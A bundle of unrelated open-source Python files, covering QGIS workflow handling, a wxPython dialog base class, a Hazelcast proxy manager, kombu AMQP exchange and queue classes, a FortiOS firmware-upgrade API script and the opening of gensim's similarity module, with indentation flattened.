def validateParameters(self, parameters):
"""
Validates a set of parameters for a valid Workflow.
:param parameters: (dict) map of workflow attributes to be validated.
:return: (str) invalidation reason.
"""
if "displayName" not in parameters or not parameters["displayName"]:
# this is not a mandatory item, but it defaults to a value
parameters["displayName"] = self.tr("DSGTools Validation Workflow")
if "models" not in parameters or not parameters["models"]:
return self.tr("Workflow seems to have no models associated with it.")
for modelName, modelParam in parameters["models"].items():
model=DsgToolsProcessingModel(modelParam, modelName)
if not model.isValid():
return self.tr("Model {model} is invalid: '{reason}'.").format(
model=modelName, reason=model.validateParameters(modelParam)
)
# if "flagLayer" not in parameters or not parameters["flagLayer"]:
# self.tr("No flag layer was provided.")
# if "historyLayer" not in parameters or not parameters["historyLayer"]:
# self.tr("No history layer was provided.")
return ""
def metadata(self):
"""
A map to Workflow's metadata.
:return: (dict) metadata.
"""
return self._param["metadata"] if "metadata" in self._param else dict()
def author(self):
"""
Retrieves Workflow's author, if available.
:return: (str) Workflow's author.
"""
meta = self.metadata()
return meta["author"] if "author" in meta else ""
def version(self):
"""
Retrieves Workflow's version, if available.
:return: (str) Workflow's version.
"""
meta = self.metadata()
return meta["version"] if "version" in meta else ""
def lastModified(self):
"""
Retrieves Workflow's last modification "timestamp", if available.
:return: (str) Workflow's last modification time and date.
"""
meta = self.metadata()
return meta["lastModified"] if "lastModified" in meta else ""
def metadataText(self):
"""
Retrieves Workflow's metadata string.
:return: (str) Workflow's metadata string.
"""
if not self.metadata():
return ""
return self.tr(
"Workflow {name} v{version} ({lastModified}) by {author}."
).format(name=self.displayName(), **self.metadata())
def displayName(self):
"""
Friendly name for the workflow.
:return: (str) display name.
"""
return self._param["displayName"] if \
"displayName" in self._param else ""
def name(self):
"""
Proxy method for displayName.
:return: (str) display name.
"""
return self.displayName()
def models(self):
"""
Model parameters defined to run in this workflow.
:return: (dict) models maps to valid and invalid models.
"""
models = {"valid" : dict(), "invalid" : dict()}
self._multiStepFeedback = QgsProcessingMultiStepFeedback(
len(self._param["models"]), self.feedback
)
self._multiStepFeedback.setCurrentStep(0)
for modelName, modelParam in self._param["models"].items():
model = DsgToolsProcessingModel(
modelParam, modelName, feedback=self._multiStepFeedback
)
if not model.isValid():
models["invalid"][modelName] = model.validateParameters(modelParam)
else:
models["valid"][modelName] = model
return models
def validModels(self):
"""
Returns all valid models from workflow parameters.
:return: (dict) models maps to valid and invalid models.
"""
models = dict()
self._multiStepFeedback = QgsProcessingMultiStepFeedback(
len(self._param["models"]), self.feedback
)
self._multiStepFeedback.setCurrentStep(0)
for idx, (modelName, modelParam) in enumerate(self._param["models"].items()):
model = DsgToolsProcessingModel(
modelParam, modelName, feedback=self._multiStepFeedback
)
if model.isValid():
models[modelName] = model
self._modelOrderMap[modelName] = idx
return models
def invalidModels(self):
"""
Returns all valid models from workflow parameters.
:return: (dict) models maps invalid models to their invalidation reason.
"""
models = dict()
self._multiStepFeedback = QgsProcessingMultiStepFeedback(
len(self._param["models"]), self.feedback
)
self._multiStepFeedback.setCurrentStep(0)
for modelName, modelParam in self._param["models"].items():
model = DsgToolsProcessingModel(
modelParam, modelName, feedback=self._multiStepFeedback
)
if not model.isValid():
models[modelName] = model.validateParameters(modelParam)
return models
def hasInvalidModel(self):
"""
Checks if any of the nested models is invalid.
:return: (bool) if there are invalid models.
"""
models = dict()
for modelName, modelParam in self._param["models"].items():
model = DsgToolsProcessingModel(modelParam, modelName)
if not model.isValid():
return True
return False
# def flagLayer(self):
# """
# Layer to work as a sink to flag output for all models.
# :return: (QgsVectorLayer) flag layer.
# """
# return self._param["flagLayer"] if "flagLayer" in self._param else ""
# def historyLayer(self):
# """
# A table (a layer with no geometry) to store execution history.
# :return: (QgsVectorLayer) flag layer.
# """
# return self._param["flagLayer"] if "flagLayer" in self._param else ""
def export(self, filepath):
"""
Dumps workflow's parameters as a JSON file.
:param filepath: (str) path to JSON file.
:return: (bool) operation success.
"""
with open(filepath, "w", encoding="utf-8") as fp:
fp.write(json.dumps(self._param, indent=4))
return os.path.exists(filepath)
def asDict(self):
"""
Dumps model parameters as a JSON file.
:param filepath: (str) path to JSON file.
:return: (dict) DSGTools processing model definitions.
"""
return dict(self._param)
def finished(self):
"""
Executes all post-processing actions.
"""
# Add default post-processing actions here!
self.workflowFinished.emit()
def runOnMainThread(self):
"""
If, for some reason, Workflow should not be run from secondary threads,
this method provides a 'static' execution alternative.
:return: (dict) a map to each model's output.
"""
self.output = dict()
for model in self.validModels().values():
start = time()
mName = model.name()
self.output[mName] = dict()
try:
self.output[mName]["result"] = {
k.split(":", 2)[-1] : v \
for k, v in model.runModel(model.feedback).items()
}
self.output[mName]["status"] = True
except:
self.output[mName]["result"] = None
self.output[mName]["status"] = False
self.output[mName]["executionTime"] = time() - start
self.finished()
return self.output
def setupModelTask(self, model):
"""
Sets model to run on QGIS task manager.
"""
QgsApplication.taskManager().addTask(model)
def hold(self):
"""
Puts current active tasks/models on hold.
"""
if not hasattr(self, "_executionOrder"):
return
for m in self._executionOrder.values():
if m.status() == m.Running:
m.hold()
def unhold(self):
"""
Puts current paused tasks/models back to active status.
"""
if not hasattr(self, "_executionOrder"):
return
for m in self._executionOrder.values():
if m.status() == m.OnHold:
m.unhold()
def currentModel(self):
"""
Retrieves the model currently running, if any.
:return: (DsgToolsProcessingModel) current active model.
"""
if not hasattr(self, "_executionOrder"):
return None
for m in self._executionOrder.values():
if m.status() == m.Running:
return m
return None
def raiseFlagWarning(self, model):
"""
Advises connected objects that flags were raised even though workflow
:param model: (DsgToolsProcessingModel) model to have its flags checked.
"""
if model.hasFlags():
self.modelFinishedWithFlags.emit(model)
else:
self.modelFinished.emit(model)
def raiseFlagError(self, model):
"""
It stops the workflow execution if flags are identified.
:param model: (DsgToolsProcessingModel) model to have its flags checked.
"""
if model.hasFlags():
self.feedback.cancel()
self.haltedOnFlags.emit(model)
else:
self.modelFinished.emit(model)
return self.feedback.isCanceled()
def handleFlags(self, model):
"""
Handles Workflow behaviour for a model's flag output.
:param model: (DsgToolsProcessingModel) model to have its output handled.
"""
onFlagsMethod = {
"warn" : partial(self.raiseFlagWarning, model),
"halt" : partial(self.raiseFlagError, model),
"ignore" : partial(self.modelFinished.emit, model)
}[model.onFlagsRaised()]()
def run(self, firstModelName=None, cooldown=None):
"""
Executes all models in secondary threads.
:param firstModelName: (str) first model's name to be executed.
:param cooldown: (float) time to wait till next model is started.
"""
self._executionOrder = {
idx: model for idx, model in enumerate(self.validModels().values())
}
modelCount = len(self._executionOrder)
if self.hasInvalidModel() or modelCount == 0:
return None
def modelCompleted(model, step):
self.output[model.name()] = model.output
self._multiStepFeedback.setCurrentStep(step)
self.handleFlags(model)
if firstModelName is not None:
for idx, model in self._executionOrder.items():
if model.name() == firstModelName:
initialIdx = idx
break
else:
# name was not found
return None
else:
initialIdx = 0
self.output = dict()
for idx, currentModel in self._executionOrder.items():
if idx < initialIdx:
continue
# all models MUST pass through this postprocessing method
currentModel.taskCompleted.connect(
partial(modelCompleted, currentModel, idx + 1)
)
currentModel.begun.connect(
partial(self.modelStarted.emit, currentModel)
)
currentModel.taskTerminated.connect(
partial(self.modelFailed.emit, currentModel)
)
if idx != modelCount - 1:
self._executionOrder[idx + 1].addSubTask(
currentModel,
subTaskDependency=currentModel.ParentDependsOnSubTask
)
else:
# last model indicates workflow finish
currentModel.taskCompleted.connect(self.finished)
# last model will trigger every dependent model till the first added to
# the task manager
self.setupModelTask(currentModel)
def lastModelName(self):
"""
Gets the last model prepared to execute but has either failed or not
run.
:return: (str) first model's name not to run.
"""
if not hasattr(self, "_executionOrder"):
return None
modelCount = len(self._executionOrder)
for idx, model in self._executionOrder.items():
modelName = self._executionOrder[idx].displayName()
if modelName not in self.output or \
self.output[modelName]["finishStatus"] != "finished":
return modelName
else:
return None
|
###############################################################################
# Name: ecbasewin.py #
# Purpose: Eclib Base Window Classes #
# Author: Cody Precord <[email protected]> #
# Copyright: (c) 2009 Cody Precord <[email protected]> #
# License: wxWindows License #
###############################################################################
"""
Editra Control Library: Base Window Classes
"""
__author__ = "Cody Precord <[email protected]>"
__svnid__ = "$Id: ecbasewin.py 69410 2011-10-13 14:20:12Z CJP $"
__revision__ = "$Revision: 69410 $"
__all__ = ["ECBaseDlg", "expose"]
#-----------------------------------------------------------------------------#
# Imports
import wx
#-----------------------------------------------------------------------------#
# Decorators
class expose(object):
"""Expose a panels method to a to a specified class
The specified class must have a GetPanel method
"""
def __init__(self, cls):
"""@param cls: class to expose the method to"""
super(expose, self).__init__()
self.cls = cls
def __call__(self, funct):
fname = funct.func_name
def parentmeth(*args, **kwargs):
self = args[0]
return getattr(self.GetPanel(), fname)(*args[1:], **kwargs)
parentmeth.__name__ = funct.__name__
parentmeth.__doc__ = funct.__doc__
setattr(self.cls, fname, parentmeth)
return funct
#-----------------------------------------------------------------------------#
class ECBaseDlg(wx.Dialog):
"""Editra Control Library Base Dialog Class"""
def __init__(self, parent, id=wx.ID_ANY, title=u"",
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=wx.DEFAULT_DIALOG_STYLE, name=u"ECBaseDialog"):
super(ECBaseDlg, self).__init__(parent, id, title, pos,
size, style, name)
# Attributes
self._panel = None
# Setup
self.SetSizer(wx.BoxSizer(wx.VERTICAL))
Panel = property(lambda self: self.GetPanel(),
lambda self, val: self.SetPanel(val))
def GetPanel(self):
"""Get the dialogs main panel"""
return self._panel
def SetPanel(self, panel):
"""Set the dialogs main panel"""
assert isinstance(panel, wx.Panel)
if self._panel is not None:
self._panel.Destroy()
self._panel = panel
self.Sizer.Add(self._panel, 1, wx.EXPAND)
|
from hazelcast.protocol.codec import client_create_proxy_codec, client_destroy_proxy_codec
from hazelcast.proxy.atomic_long import AtomicLong
from hazelcast.proxy.atomic_reference import AtomicReference
from hazelcast.proxy.count_down_latch import CountDownLatch
from hazelcast.proxy.executor import Executor
from hazelcast.proxy.id_generator import IdGenerator
from hazelcast.proxy.list import List
from hazelcast.proxy.lock import Lock
from hazelcast.proxy.map import create_map_proxy
from hazelcast.proxy.multi_map import MultiMap
from hazelcast.proxy.queue import Queue
from hazelcast.proxy.reliable_topic import ReliableTopic
from hazelcast.proxy.replicated_map import ReplicatedMap
from hazelcast.proxy.ringbuffer import Ringbuffer
from hazelcast.proxy.semaphore import Semaphore
from hazelcast.proxy.set import Set
from hazelcast.proxy.topic import Topic
ATOMIC_LONG_SERVICE = "hz:impl:atomicLongService"
ATOMIC_REFERENCE_SERVICE = "hz:impl:atomicReferenceService"
COUNT_DOWN_LATCH_SERVICE = "hz:impl:countDownLatchService"
ID_GENERATOR_SERVICE = "hz:impl:idGeneratorService"
EXECUTOR_SERVICE = "hz:impl:executorService"
LOCK_SERVICE = "hz:impl:lockService"
LIST_SERVICE = "hz:impl:listService"
MULTI_MAP_SERVICE = "hz:impl:multiMapService"
MAP_SERVICE = "hz:impl:mapService"
RELIABLE_TOPIC_SERVICE = "hz:impl:reliableTopicService"
REPLICATED_MAP_SERVICE = "hz:impl:replicatedMapService"
RINGBUFFER_SERIVCE = "hz:impl:ringbufferService"
SEMAPHORE_SERVICE = "hz:impl:semaphoreService"
SET_SERVICE = "hz:impl:setService"
QUEUE_SERVICE = "hz:impl:queueService"
TOPIC_SERVICE = "hz:impl:topicService"
ID_GENERATOR_ATOMIC_LONG_PREFIX = "hz:atomic:idGenerator:"
_proxy_init = {
ATOMIC_LONG_SERVICE: AtomicLong,
ATOMIC_REFERENCE_SERVICE: AtomicReference,
COUNT_DOWN_LATCH_SERVICE: CountDownLatch,
ID_GENERATOR_SERVICE: IdGenerator,
EXECUTOR_SERVICE: Executor,
LIST_SERVICE: List,
LOCK_SERVICE: Lock,
MAP_SERVICE: create_map_proxy,
MULTI_MAP_SERVICE: MultiMap,
QUEUE_SERVICE: Queue,
RELIABLE_TOPIC_SERVICE: ReliableTopic,
REPLICATED_MAP_SERVICE: ReplicatedMap,
RINGBUFFER_SERIVCE: Ringbuffer,
SEMAPHORE_SERVICE: Semaphore,
SET_SERVICE: Set,
TOPIC_SERVICE: Topic
}
class ProxyManager(object):
def __init__(self, client):
self._client = client
self._proxies = {}
def get_or_create(self, service_name, name, **kwargs):
ns = (service_name, name)
if ns in self._proxies:
return self._proxies[ns]
proxy = self.create_proxy(service_name, name, **kwargs)
self._proxies[ns] = proxy
return proxy
def create_proxy(self, service_name, name, **kwargs):
message = client_create_proxy_codec.encode_request(name=name, service_name=service_name,
target=self._find_next_proxy_address())
self._client.invoker.invoke_on_random_target(message).result()
return _proxy_init[service_name](client=self._client, service_name=service_name, name=name, **kwargs)
def destroy_proxy(self, service_name, name):
ns = (service_name, name)
try:
self._proxies.pop(ns)
message = client_destroy_proxy_codec.encode_request(name=name, service_name=service_name)
self._client.invoker.invoke_on_random_target(message).result()
return True
except KeyError:
return False
def _find_next_proxy_address(self):
# TODO: filter out lite members
return self._client.load_balancer.next_address()
|
"""
kombu.entity
================
Exchange and Queue declarations.
:copyright: (c) 2009 - 2011 by Ask Solem.
:license: BSD, see LICENSE for more details.
"""
from kombu.abstract import MaybeChannelBound
from kombu.syn import blocking as _SYN
TRANSIENT_DELIVERY_MODE = 1
PERSISTENT_DELIVERY_MODE = 2
DELIVERY_MODES = {"transient": TRANSIENT_DELIVERY_MODE,
"persistent": PERSISTENT_DELIVERY_MODE}
class Exchange(MaybeChannelBound):
"""An Exchange declaration.
:keyword name: See :attr:`name`.
:keyword type: See :attr:`type`.
:keyword channel: See :attr:`channel`.
:keyword durable: See :attr:`durable`.
:keyword auto_delete: See :attr:`auto_delete`.
:keyword delivery_mode: See :attr:`delivery_mode`.
:keyword arguments: See :attr:`arguments`.
.. attribute:: name
Name of the exchange. Default is no name (the default exchange).
.. attribute:: type
AMQP defines four default exchange types (routing algorithms) that
covers most of the common messaging use cases. An AMQP broker can
also define additional exchange types, so see your broker
manual for more information about available exchange types.
* `direct` (*default*)
Direct match between the routing key in the message, and the
routing criteria used when a queue is bound to this exchange.
* `topic`
Wildcard match between the routing key and the routing pattern
specified in the exchange/queue binding. The routing key is
treated as zero or more words delimited by `"."` and
supports special wildcard characters. `"*"` matches a
single word and `"#"` matches zero or more words.
* `fanout`
Queues are bound to this exchange with no arguments. Hence any
message sent to this exchange will be forwarded to all queues
bound to this exchange.
* `headers`
Queues are bound to this exchange with a table of arguments
containing headers and values (optional). A special argument
named "x-match" determines the matching algorithm, where
`"all"` implies an `AND` (all pairs must match) and
`"any"` implies `OR` (at least one pair must match).
:attr:`arguments` is used to specify the arguments.
This description of AMQP exchange types was shamelessly stolen
from the blog post `AMQP in 10 minutes: Part 4`_ by
Rajith Attapattu. This article is recommended reading.
.. _`AMQP in 10 minutes: Part 4`:
http://bit.ly/amqp-exchange-types
.. attribute:: channel
The channel the exchange is bound to (if bound).
.. attribute:: durable
Durable exchanges remain active when a server restarts. Non-durable
exchanges (transient exchanges) are purged when a server restarts.
Default is :const:`True`.
.. attribute:: auto_delete
If set, the exchange is deleted when all queues have finished
using it. Default is :const:`False`.
.. attribute:: delivery_mode
The default delivery mode used for messages. The value is an integer,
or alias string.
* 1 or `"transient"`
The message is transient. Which means it is stored in
memory only, and is lost if the server dies or restarts.
* 2 or "persistent" (*default*)
The message is persistent. Which means the message is
stored both in-memory, and on disk, and therefore
preserved if the server dies or restarts.
The default value is 2 (persistent).
.. attribute:: arguments
Additional arguments to specify when the exchange is declared.
"""
TRANSIENT_DELIVERY_MODE = TRANSIENT_DELIVERY_MODE
PERSISTENT_DELIVERY_MODE = PERSISTENT_DELIVERY_MODE
name = ""
type = "direct"
durable = True
auto_delete = False
delivery_mode = PERSISTENT_DELIVERY_MODE
attrs = (("name", None),
("type", None),
("arguments", None),
("durable", bool),
("auto_delete", bool),
("delivery_mode", lambda m: DELIVERY_MODES.get(m) or m))
def __init__(self, name="", type="", channel=None, **kwargs):
super(Exchange, self).__init__(**kwargs)
self.name = name or self.name
self.type = type or self.type
self.maybe_bind(channel)
def declare(self, nowait=False):
"""Declare the exchange.
Creates the exchange on the broker.
:keyword nowait: If set the server will not respond, and a
response will not be waited for. Default is :const:`False`.
"""
return _SYN(self.channel.exchange_declare, exchange=self.name,
type=self.type,
durable=self.durable,
auto_delete=self.auto_delete,
arguments=self.arguments,
nowait=nowait)
def Message(self, body, delivery_mode=None, priority=None,
content_type=None, content_encoding=None, properties=None,
headers=None):
"""Create message instance to be sent with :meth:`publish`.
:param body: Message body.
:keyword delivery_mode: Set custom delivery mode. Defaults
to :attr:`delivery_mode`.
:keyword priority: Message priority, 0 to 9. (currently not
supported by RabbitMQ).
:keyword content_type: The messages content_type. If content_type
is set, no serialization occurs as it is assumed this is either
a binary object, or you've done your own serialization.
Leave blank if using built-in serialization as our library
properly sets content_type.
:keyword content_encoding: The character set in which this object
is encoded. Use "binary" if sending in raw binary objects.
Leave blank if using built-in serialization as our library
properly sets content_encoding.
:keyword properties: Message properties.
:keyword headers: Message headers.
"""
properties = properties or {}
delivery_mode = delivery_mode or self.delivery_mode
properties["delivery_mode"] = DELIVERY_MODES.get(delivery_mode,
delivery_mode)
return self.channel.prepare_message(body,
properties=properties,
priority=priority,
content_type=content_type,
content_encoding=content_encoding,
headers=headers)
def publish(self, message, routing_key=None, mandatory=False,
immediate=False, exchange=None):
"""Publish message.
:param message: :meth:`Message` instance to publish.
:param routing_key: Routing key.
:param mandatory: Currently not supported.
:param immediate: Currently not supported.
"""
exchange = exchange or self.name
return self.channel.basic_publish(message,
exchange=exchange,
routing_key=routing_key,
mandatory=mandatory,
immediate=immediate)
def delete(self, if_unused=False, nowait=False):
"""Delete the exchange declaration on server.
:keyword if_unused: Delete only if the exchange has no bindings.
Default is :const:`False`.
:keyword nowait: If set the server will not respond, and a
response will not be waited for. Default is :const:`False`.
"""
return _SYN(self.channel.exchange_delete, exchange=self.name,
if_unused=if_unused,
nowait=nowait)
def __eq__(self, other):
if isinstance(other, Exchange):
return (self.name == other.name and
self.type == other.type and
self.arguments == other.arguments and
self.durable == other.durable and
self.auto_delete == other.auto_delete and
self.delivery_mode == other.delivery_mode)
return False
def __repr__(self):
return super(Exchange, self).__repr__("Exchange %s(%s)" % (self.name,
self.type))
class Queue(MaybeChannelBound):
"""A Queue declaration.
:keyword name: See :attr:`name`.
:keyword exchange: See :attr:`exchange`.
:keyword routing_key: See :attr:`routing_key`.
:keyword channel: See :attr:`channel`.
:keyword durable: See :attr:`durable`.
:keyword exclusive: See :attr:`exclusive`.
:keyword auto_delete: See :attr:`auto_delete`.
:keyword queue_arguments: See :attr:`queue_arguments`.
:keyword binding_arguments: See :attr:`binding_arguments`.
.. attribute:: name
Name of the queue. Default is no name (default queue destination).
.. attribute:: exchange
The :class:`Exchange` the queue binds to.
.. attribute:: routing_key
The routing key (if any), also called *binding key*.
The interpretation of the routing key depends on
the :attr:`Exchange.type`.
* direct exchange
Matches if the routing key property of the message and
the :attr:`routing_key` attribute are identical.
* fanout exchange
Always matches, even if the binding does not have a key.
* topic exchange
Matches the routing key property of the message by a primitive
pattern matching scheme. The message routing key then consists
of words separated by dots (`"."`, like domain names), and
two special characters are available; star (`"*"`) and hash
(`"#"`). The star matches any word, and the hash matches
zero or more words. For example `"*.stock.#"` matches the
routing keys `"usd.stock"` and `"eur.stock.db"` but not
`"stock.nasdaq"`.
.. attribute:: channel
The channel the Queue is bound to (if bound).
.. attribute:: durable
Durable queues remain active when a server restarts.
Non-durable queues (transient queues) are purged if/when
a server restarts.
Note that durable queues do not necessarily hold persistent
messages, although it does not make sense to send
persistent messages to a transient queue.
Default is :const:`True`.
.. attribute:: exclusive
Exclusive queues may only be consumed from by the
current connection. Setting the 'exclusive' flag
always implies 'auto-delete'.
Default is :const:`False`.
.. attribute:: auto_delete
If set, the queue is deleted when all consumers have
finished using it. Last consumer can be cancelled
either explicitly or because its channel is closed. If
there was no consumer ever on the queue, it won't be
deleted.
.. attribute:: queue_arguments
Additional arguments used when declaring the queue.
.. attribute:: binding_arguments
Additional arguments used when binding the queue.
"""
name = ""
exchange = None
routing_key = ""
durable = True
exclusive = False
auto_delete = False
attrs = (("name", None),
("exchange", None),
("routing_key", None),
("queue_arguments", None),
("binding_arguments", None),
("durable", bool),
("exclusive", bool),
("auto_delete", bool))
def __init__(self, name="", exchange=None, routing_key="", channel=None,
**kwargs):
super(Queue, self).__init__(**kwargs)
self.name = name or self.name
self.exchange = exchange or self.exchange
self.routing_key = routing_key or self.routing_key
# exclusive implies auto-delete.
if self.exclusive:
self.auto_delete = True
self.maybe_bind(channel)
def when_bound(self):
self.exchange = self.exchange(self.channel)
def declare(self, nowait=False):
"""Declares the queue, the exchange and binds the queue to
the exchange."""
return (self.name and self.exchange.declare(nowait),
self.name and self.queue_declare(nowait, passive=False),
self.name and self.queue_bind(nowait))
def queue_declare(self, nowait=False, passive=False):
"""Declare queue on the server.
:keyword nowait: Do not wait for a reply.
:keyword passive: If set, the server will not create the queue.
The client can use this to check whether a queue exists
without modifying the server state.
"""
return _SYN(self.channel.queue_declare, queue=self.name,
passive=passive,
durable=self.durable,
exclusive=self.exclusive,
auto_delete=self.auto_delete,
arguments=self.queue_arguments,
nowait=nowait)
def queue_bind(self, nowait=False):
"""Create the queue binding on the server.
:keyword nowait: Do not wait for a reply.
"""
return _SYN(self.channel.queue_bind, queue=self.name,
exchange=self.exchange.name,
routing_key=self.routing_key,
arguments=self.binding_arguments,
nowait=nowait)
def get(self, no_ack=None):
"""Poll the server for a new message.
Returns the message instance if a message was available,
or :const:`None` otherwise.
:keyword no_ack: If set messages received does not have to
be acknowledged.
This method provides direct access to the messages in a
queue using a synchronous dialogue, designed for
specific types of applications where synchronous functionality
is more important than performance.
"""
message = _SYN(self.channel.basic_get, queue=self.name, no_ack=no_ack)
if message is not None:
return self.channel.message_to_python(message)
def purge(self, nowait=False):
"""Remove all messages from the queue."""
return _SYN(self.channel.queue_purge, queue=self.name,
nowait=nowait) or 0
def consume(self, consumer_tag='', callback=None, no_ack=None,
nowait=False):
"""Start a queue consumer.
Consumers last as long as the channel they were created on, or
until the client cancels them.
:keyword consumer_tag: Unique identifier for the consumer. The
consumer tag is local to a connection, so two clients
can use the same consumer tags. If this field is empty
the server will generate a unique tag.
:keyword no_ack: If set messages received does not have to
be acknowledged.
:keyword nowait: Do not wait for a reply.
:keyword callback: callback called for each delivered message
"""
return self.channel.basic_consume(queue=self.name,
no_ack=no_ack,
consumer_tag=consumer_tag or '',
callback=callback,
nowait=nowait)
def cancel(self, consumer_tag):
"""Cancel a consumer by consumer tag."""
return self.channel.basic_cancel(consumer_tag)
def delete(self, if_unused=False, if_empty=False, nowait=False):
"""Delete the queue.
:keyword if_unused: If set, the server will only delete the queue
if it has no consumers. A channel error will be raised
if the queue has consumers.
:keyword if_empty: If set, the server will only delete the queue
if it is empty. If if's not empty a channel error will be raised.
:keyword nowait: Do not wait for a reply.
"""
return _SYN(self.channel.queue_delete, queue=self.name,
if_unused=if_unused,
if_empty=if_empty,
nowait=nowait)
def unbind(self):
"""Delete the binding on the server."""
return _SYN(self.channel.queue_unbind, queue=self.name,
exchange=self.exchange.name,
routing_key=self.routing_key,
arguments=self.binding_arguments)
def __eq__(self, other):
if isinstance(other, Queue):
return (self.name == other.name and
self.exchange == other.exchange and
self.routing_key == other.routing_key and
self.queue_arguments == other.queue_arguments and
self.binding_arguments == other.binding_arguments and
self.durable == other.durable and
self.exclusive == other.exclusive and
self.auto_delete == other.auto_delete)
return False
def __repr__(self):
return super(Queue, self).__repr__(
"Queue %s -> %s -> %s" % (self.name,
self.exchange,
self.routing_key))
|
#!/usr/bin/env python3
'''
Upgrade firmware image on this device using uploaded file.
Method
https://<DEVICE_IP>/api/v2/monitor/system/firmware/upgrade/
CLI
NA
Debug
FG # diag debug ena
FG # d de app httpsd -1
[httpsd 181 - 1535636630 info] ap_invoke_handler[593] -- new request (handler='api_monitor_v2-handler', uri='/api/v2/monitor/system/firmware/upgrade', method='POST')
[httpsd 181 - 1535636630 info] ap_invoke_handler[597] -- User-Agent: python-requests/2.19.1
[httpsd 181 - 1535636630 info] ap_invoke_handler[600] -- Source: 172.30.248.57:53110 Destination: 192.168.0.1:443
[httpsd 181 - 1535636630 info] endpoint_handle_req[594] -- received api_monitor_v2_request from '172.30.248.57'
[httpsd 181 - 1535636630 info] aps_init_process_vdom[1163] -- initialized process vdom to 'root' (cookie='(null)')
[httpsd 181 - 1535636630 info] api_store_parameter[227] -- add API parameter 'source': '"fortiguard"' (type=string)
[httpsd 181 - 1535636630 info] api_store_parameter[227] -- add API parameter 'filename': '"06000000FIMG0012000000"' (type=string)
[httpsd 181 - 1535636630 info] endpoint_process_req_vdom[444] -- new API request (action='upgrade',path='system',name='firmware',vdom='root',user='admin')
[httpsd 181 - 1535636630 info] system_firmware_upgrade[1635] -- firmware upgrade attempt from management station for image '06000000FIMG0012000000'
[httpsd 181 - 1535636643 info] _system_firmware_download_fds[1549] -- firmware download state: 0
[httpsd 181 - 1535636643 info] system_firmware_upgrade[1648] -- upgrade attempt for '/tmp/fdsm.out'
[httpsd 181 - 1535636643 error] system_firmware_upgrade[1652] -- upgrade initiated for '/tmp/fdsm.out'
[httpsd 181 - 1535636643 info] system_firmware_upgrade[1659] -- upgrade success for '/tmp/fdsm.out'
[httpsd 181 - 1535636643 info] ap_invoke_handler[616] -- request completed (handler='api_monitor_v2-handler' result==0)
'''
import os
import json
from fortiosapi import FortiOSAPI
FG = FortiOSAPI()
# Source _host
FG_HOST = os.environ['FG_HOST']
FG_USER = os.environ['FG_USER']
FG_PASS = os.environ['FG_PASS']
DEVICE = {
'host': FG_HOST,
'username': FG_USER,
'password': FG_PASS,
}
FG.login(**DEVICE)
# Obtain FIRMWARE_ID with monitor_system_firmware
FIRMWARE_ID = '06000000FIMG0012000000' # 6.0.0
# FIRMWARE_ID = '06000000FIMG0012000001' # 6.0.1
UPLOAD_DATA = {
'source': 'fortiguard',
'filename': FIRMWARE_ID,
}
UPLOAD_DATA = json.dumps(UPLOAD_DATA)
FG.upload('system', 'firmware/upgrade', data=UPLOAD_DATA)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
This module contains functions and classes for computing similarities across
a collection of documents in the Vector Space Model.
The main class is `Similarity`, which builds an index for a given set of documents.
Once the index is built, you can perform efficient queries like "Tell me how similar
is this query document to each document in the index?". The result is a vector
of numbers as large as the size of the initial set of documents, that is, one float
for each index document. Alternatively, you can also request only the top-N most
similar index documents to the query.
You can later add new documents to the index via `Similarity.add_documents()`.
How It Works
------------
The `Similarity` class splits the index into several smaller sub-indexes ("shards"),
which are disk-based. If your entire index fits in memory (~hundreds of thousands
documents for 1GB of RAM), you can also use the `MatrixSimilarity` or `SparseMatrixSimilarity`
classes directly. These are more simple but do not scale as well (they keep the
entire index in RAM, no sharding).
Once the index has been initialized, you can query for document similarity simply by:
>>> index = Similarity('/tmp/tst', corpus, num_features=12) # build the index
>>> similarities = index[query] # get similarities between the query and all index documents
If you have more query documents, you can submit them all at once, in a batch:
>>> for similarities in index[batch_of_documents]: # the batch is simply an iterable of documents (=gensim corpus)
>>> ...
The benefit of this batch (aka "chunked") querying is much better performance.
To see the speed-up on your machine, run ``python -m gensim.test.simspeed``
(compare to my results `here <http://groups.google.com/group/gensim/msg/4f6f171a869e4fca?>`_).
There is also a special syntax for when you need similarity of documents in the index
to the index itself (i.e. queries=indexed documents themselves). This special syntax
uses the faster, batch queries internally and **is ideal for all-vs-all pairwise similarities**:
>>> for similarities in index: # yield similarities of the 1st indexed document, then 2nd...
>>> ...
"""
import logging
import itertools
import os
import heapq
import numpy
import scipy.sparse
from gensim import interfaces, utils, matutils
from six.moves import map as imap, xrange, zip as izip
logger = logging.getLogger(__name__)
PARALLEL_SHARDS = False
try:
import multiprocessing
# by default, don't parallelize queries. uncomment the following line if you want that.
# PARALLEL_SHARDS = multiprocessing.cpu_count() # use #parallel processes = #CPus
except ImportError:
pass
class Shard(utils.SaveLoad):
"""
A proxy class that represents a single shard instance within a Similarity
index.
Basically just wraps (Sparse)MatrixSimilarity so that it mmaps from disk on
request (query).
"""
def __init__(self, fname, index):
self.dirname, self.fname = os.path.split(fname)
self.length = len(index)
self.cls = index.__class__
logger.info("saving index shard to %s", self.fullname())
index.save(self.fullname())
self.index = self.get_index()
def fullname(self):
return os.path.join(self.dirname, self.fname)
def __len__(self):
return self.length
def __getstate__(self):
result = self.__dict__.copy()
# (S)MS objects must be loaded via load() because of mmap (simple pickle.load won't do)
if 'index' in result:
del result['index']
return result
def __str__(self):
return ("%s Shard(%i documents in %s)" % (self.cls.__name__, len(self), self.fullname()))
def get_index(self):
if not hasattr(self, 'index'):
logger.debug("mmaping index from %s", self.fullname())
self.index = self.cls.load(self.fullname(), mmap='r')
return self.index
def get_document_id(self, pos):
"""Return index vector at position `pos`.
The vector is of the same type as the underlying index (ie., dense for
MatrixSimilarity and scipy.sparse for SparseMatrixSimilarity.
"""
assert 0 <= pos < len(self), "requested position out of range"
return self.get_index().index[pos]
def __getitem__(self, query):
index = self.get_index()
try:
index.num_best = self.num_best
index.normalize = self.normalize
except:
raise ValueError("num_best and normalize have to be set before querying a proxy Shard object")
return index[query]
def query_shard(args):
query, shard = args # simulate starmap (not part of multiprocessing in older Pythons)
logger.debug("querying shard %s num_best=%s in process %s", shard, shard.num_best, os.getpid())
result = shard[query]
logger.debug("finished querying shard %s in process %s", shard, os.getpid())
return result
class Similarity(interfaces.SimilarityABC):
"""
Compute cosine similarity of a dynamic query against a static corpus of documents
("the index").
Scalability is achieved by sharding the index into smaller pieces, each of which
